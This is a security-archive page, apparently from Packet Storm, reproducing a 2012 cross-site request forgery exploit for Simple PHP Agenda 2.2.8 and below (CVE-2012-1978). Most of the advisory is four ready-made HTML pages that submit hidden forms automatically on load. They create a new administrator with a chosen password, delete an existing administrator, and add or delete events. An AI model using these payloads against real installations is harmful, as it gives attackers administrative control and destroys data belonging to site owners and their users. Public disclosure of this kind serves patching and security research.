what you don't know can hurt you

Simple PHP Agenda 2.2.8 Cross Site Request Forgery

Simple PHP Agenda 2.2.8 Cross Site Request Forgery
Posted Mar 30, 2012
Authored by Ivano Binetti

Simple PHP Agenda versions 2.2.8 and below suffer from multiple cross site request forgery vulnerabilities.

tags | exploit, php, vulnerability, csrf
advisories | CVE-2012-1978
MD5 | 2115134f72ada62b4a134ceb4137c0d8

Simple PHP Agenda 2.2.8 Cross Site Request Forgery

Change Mirror Download
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Simple Php Agenda <= 2.2.8 CSRF (Add Admin/Add New Event)
# Date : 29-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://sourceforge.net/projects/php-agenda/files/latest/download
# Version : 2.2.8 and lower
# Tested on : Debian Squeeze (6.0)
# CVE : CVE-2012-1978
# Original Advisory: http://www.webapp-security.com/2012/03/simple-php-agenda/
+--------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
3)Exploit
3.1 Add Administrator
3.2 Delete Existing Administrator
3.3 Add a New Event
3.4 Delete an Existing Event
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Simple Php Agenda is "a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere there's
internet".

2)Vulnerabilities Description
Simple Php Agenda 2.2.8 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator,
delete an existing administrator, create/delete a new event and change any other parameters. In this document I will only
demonstrate how to:
- add a new administrator
- delete a existing administrator
- add a new event
- delete an existing event.
Other parameters can be also modified.

3)Exploit
3.1 Add Administrator
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/auth/process.php">
<input type="hidden" name="user" value="newadmin"/>
<input type="hidden" name="pass" value="password"/>
<input type="hidden" name="email" value="email@email.com"/>
<input type="hidden" name="subjoin" value="1"/>
</form>
</body>
</html>


3.2 Delete Existing Administrator
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/auth/admin/adminprocess.php">
<input type="hidden" name="deluser" value="pippo2"/>
<input type="hidden" name="subdeluser" value="1"/>
</form>
</body>
</html>

3.3 Add a New Event
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/engine/new_event.php">
<input type="hidden" name="date" value="2012-03-30"/>
<input type="hidden" name="time" value="16%3A30"/>
<input type="hidden" name="title" value="new_event_title"/>
<input type="hidden" name="description" value="event_description"/>
<input type="hidden" name="newEvent" value="Aggiungi+evento"/>
</form>
</body>
</html>

3.4 Delete an Existing Event
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/phpagenda/?deleteEvent=2">
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close